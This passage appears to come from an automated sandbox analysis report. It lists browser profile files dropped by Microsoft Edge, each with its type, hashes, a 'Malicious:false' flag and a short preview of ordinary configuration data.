                                                                                                                                                                                                                                                                                Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Trust Tokens

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):36864
                                                                                                                                                                                                                                                                                Entropy (8bit):0.36515621748816035
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                                                                                                                                                SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                                                                                                                                                SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                                                                                                                                                SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\cd6de0c2-5689-463b-803d-f69a9acb05b0.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1647
                                                                                                                                                                                                                                                                                Entropy (8bit):5.285325456165683
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:YXsw8stfcdsyleebsrgnsbCgHt2sqCgHtbZ:4pmke6fTqTt1
                                                                                                                                                                                                                                                                                MD5:F9242185C61A5A4236B24D9A289F4572
                                                                                                                                                                                                                                                                                SHA1:CD3AFFDD8212261D0AB1036229B12AFB6E25A4C0
                                                                                                                                                                                                                                                                                SHA-256:2C35F3199D286B9F31F4D9240C6CA08E2C4BE1F8DA394469E6FB744B56FC81F3
                                                                                                                                                                                                                                                                                SHA-512:6D4EFF40ED44EEF897A752ECAA5C42AEF1180923BC7132FC096F4A9ACCE28D321334349DE25E2078021EC2545B122F8C79C06FF876B00AD5CD62300360E1CBCD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543553940179","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543557880946","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386045162625480","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com"},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13388543564407969","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://w

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\d55da7fb-1fad-4dba-ac0d-91fbca907fe6.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):40
                                                                                                                                                                                                                                                                                Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\e510aea4-a0bb-41c4-b891-c43b5da0bd7c.tmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):22
                                                                                                                                                                                                                                                                                Entropy (8bit):3.788754913993502
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YWRAW4J2LSQ:YWyW5SQ
                                                                                                                                                                                                                                                                                MD5:3BB76EC23C5506830EAD56540E06159F
                                                                                                                                                                                                                                                                                SHA1:94695E47D907E559E91E677CEC4EB763DC0C5CA9
                                                                                                                                                                                                                                                                                SHA-256:6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
                                                                                                                                                                                                                                                                                SHA-512:307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"sts":[],"version":2}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                                Entropy (8bit):0.6852315298663104
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                                                                                                                                                MD5:19F8A237057D855585E293B39C348D63
                                                                                                                                                                                                                                                                                SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                                                                                                                                                SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                                                                                                                                                SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9675
                                                                                                                                                                                                                                                                                Entropy (8bit):4.95959181108295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVfkdpPJ5KaY4bh+8Kpj+FbFr1QA3woz1f:sVfQPJ5KKYpU/Q58
                                                                                                                                                                                                                                                                                MD5:7CEA3ACECCE69184AF93907BAB9D5C0F
                                                                                                                                                                                                                                                                                SHA1:A373CA2527E7C8EB77F4E02AA088060D8063E886
                                                                                                                                                                                                                                                                                SHA-256:9D53B50AD43B91B3B0B6AB2B2A17E0DD7FBE51E12129F269BE1F2685AF7DEE24
                                                                                                                                                                                                                                                                                SHA-512:AA8C4369D41FC3BC31CAAB0B96B4A873B07A6A0C94D9F020AAFB85430263489D9399A396B19702C39D0DDFB4773C59C014A91589A0157A04A1E748C0DED2BC44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF27fe4.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9675
                                                                                                                                                                                                                                                                                Entropy (8bit):4.95959181108295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVfkdpPJ5KaY4bh+8Kpj+FbFr1QA3woz1f:sVfQPJ5KKYpU/Q58
                                                                                                                                                                                                                                                                                MD5:7CEA3ACECCE69184AF93907BAB9D5C0F
                                                                                                                                                                                                                                                                                SHA1:A373CA2527E7C8EB77F4E02AA088060D8063E886
                                                                                                                                                                                                                                                                                SHA-256:9D53B50AD43B91B3B0B6AB2B2A17E0DD7FBE51E12129F269BE1F2685AF7DEE24
                                                                                                                                                                                                                                                                                SHA-512:AA8C4369D41FC3BC31CAAB0B96B4A873B07A6A0C94D9F020AAFB85430263489D9399A396B19702C39D0DDFB4773C59C014A91589A0157A04A1E748C0DED2BC44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2bc9f.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9675
                                                                                                                                                                                                                                                                                Entropy (8bit):4.95959181108295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVfkdpPJ5KaY4bh+8Kpj+FbFr1QA3woz1f:sVfQPJ5KKYpU/Q58
                                                                                                                                                                                                                                                                                MD5:7CEA3ACECCE69184AF93907BAB9D5C0F
                                                                                                                                                                                                                                                                                SHA1:A373CA2527E7C8EB77F4E02AA088060D8063E886
                                                                                                                                                                                                                                                                                SHA-256:9D53B50AD43B91B3B0B6AB2B2A17E0DD7FBE51E12129F269BE1F2685AF7DEE24
                                                                                                                                                                                                                                                                                SHA-512:AA8C4369D41FC3BC31CAAB0B96B4A873B07A6A0C94D9F020AAFB85430263489D9399A396B19702C39D0DDFB4773C59C014A91589A0157A04A1E748C0DED2BC44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2e620.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9675
                                                                                                                                                                                                                                                                                Entropy (8bit):4.95959181108295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVfkdpPJ5KaY4bh+8Kpj+FbFr1QA3woz1f:sVfQPJ5KKYpU/Q58
                                                                                                                                                                                                                                                                                MD5:7CEA3ACECCE69184AF93907BAB9D5C0F
                                                                                                                                                                                                                                                                                SHA1:A373CA2527E7C8EB77F4E02AA088060D8063E886
                                                                                                                                                                                                                                                                                SHA-256:9D53B50AD43B91B3B0B6AB2B2A17E0DD7FBE51E12129F269BE1F2685AF7DEE24
                                                                                                                                                                                                                                                                                SHA-512:AA8C4369D41FC3BC31CAAB0B96B4A873B07A6A0C94D9F020AAFB85430263489D9399A396B19702C39D0DDFB4773C59C014A91589A0157A04A1E748C0DED2BC44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF331cf.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9675
                                                                                                                                                                                                                                                                                Entropy (8bit):4.95959181108295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVfkdpPJ5KaY4bh+8Kpj+FbFr1QA3woz1f:sVfQPJ5KKYpU/Q58
                                                                                                                                                                                                                                                                                MD5:7CEA3ACECCE69184AF93907BAB9D5C0F
                                                                                                                                                                                                                                                                                SHA1:A373CA2527E7C8EB77F4E02AA088060D8063E886
                                                                                                                                                                                                                                                                                SHA-256:9D53B50AD43B91B3B0B6AB2B2A17E0DD7FBE51E12129F269BE1F2685AF7DEE24
                                                                                                                                                                                                                                                                                SHA-512:AA8C4369D41FC3BC31CAAB0B96B4A873B07A6A0C94D9F020AAFB85430263489D9399A396B19702C39D0DDFB4773C59C014A91589A0157A04A1E748C0DED2BC44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF41fc9.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):9675
                                                                                                                                                                                                                                                                                Entropy (8bit):4.95959181108295
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:sVfkdpPJ5KaY4bh+8Kpj+FbFr1QA3woz1f:sVfQPJ5KKYpU/Q58
                                                                                                                                                                                                                                                                                MD5:7CEA3ACECCE69184AF93907BAB9D5C0F
                                                                                                                                                                                                                                                                                SHA1:A373CA2527E7C8EB77F4E02AA088060D8063E886
                                                                                                                                                                                                                                                                                SHA-256:9D53B50AD43B91B3B0B6AB2B2A17E0DD7FBE51E12129F269BE1F2685AF7DEE24
                                                                                                                                                                                                                                                                                SHA-512:AA8C4369D41FC3BC31CAAB0B96B4A873B07A6A0C94D9F020AAFB85430263489D9399A396B19702C39D0DDFB4773C59C014A91589A0157A04A1E748C0DED2BC44
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951549506799","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                Entropy (8bit):4.051821770808046
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                                                                                                                MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                                                                                                                SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                                                                                                                SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                                                                                                                SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"preferred_apps":[],"version":1}

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24853
                                                                                                                                                                                                                                                                                Entropy (8bit):5.565515102457312
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:8DVLB6WPUGfET8F1+UoAYDCx9Tuqh0VfUC9xbog/OVvaD5brwCLIhpZtuu6W:8DVLB6WPUGfETu1jaSi5wCgtn
                                                                                                                                                                                                                                                                                MD5:5B47B81C6BE388AB24252E0FF382EAA0
                                                                                                                                                                                                                                                                                SHA1:506CD37EE86E7C31A7D9B455F34EC3F7ADBF8BFB
                                                                                                                                                                                                                                                                                SHA-256:8A846D7438134C886F16F3CF4D0055F9B36B8AC8F592F60E5C5CCC37E68E7126
                                                                                                                                                                                                                                                                                SHA-512:C92453086F32AC8C30F036E5B162C6F727764628B360233486C8537CAB37852507F46E88516F17DDC6746287D983B0983EAE8ECDDEA5C7E59F01C2778960A0DF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951548871166","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951548871166","location":5,"ma

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF26f4a.TMP (copy)

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):24853
                                                                                                                                                                                                                                                                                Entropy (8bit):5.565515102457312
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:8DVLB6WPUGfET8F1+UoAYDCx9Tuqh0VfUC9xbog/OVvaD5brwCLIhpZtuu6W:8DVLB6WPUGfETu1jaSi5wCgtn
                                                                                                                                                                                                                                                                                MD5:5B47B81C6BE388AB24252E0FF382EAA0
                                                                                                                                                                                                                                                                                SHA1:506CD37EE86E7C31A7D9B455F34EC3F7ADBF8BFB
                                                                                                                                                                                                                                                                                SHA-256:8A846D7438134C886F16F3CF4D0055F9B36B8AC8F592F60E5C5CCC37E68E7126
                                                                                                                                                                                                                                                                                SHA-512:C92453086F32AC8C30F036E5B162C6F727764628B360233486C8537CAB37852507F46E88516F17DDC6746287D983B0983EAE8ECDDEA5C7E59F01C2778960A0DF
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951548871166","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951548871166","location":5,"ma

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2403
                                                                                                                                                                                                                                                                                Entropy (8bit):5.81267273826869
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:F2emhqfrd60fx9rd1sOLLrd6XxsKrdJxw:F1mwfx60Hx1sWLx6eKx4
                                                                                                                                                                                                                                                                                MD5:B1EEE9E1DD64FBCCACFF27CB98688277
                                                                                                                                                                                                                                                                                SHA1:883CD0DB0DB86290265E5F655AE31EAA80C3FA8D
                                                                                                                                                                                                                                                                                SHA-256:3975A80B44047C20AC1B62CE0697E398233A4109ABD96D7A6520993F188E435A
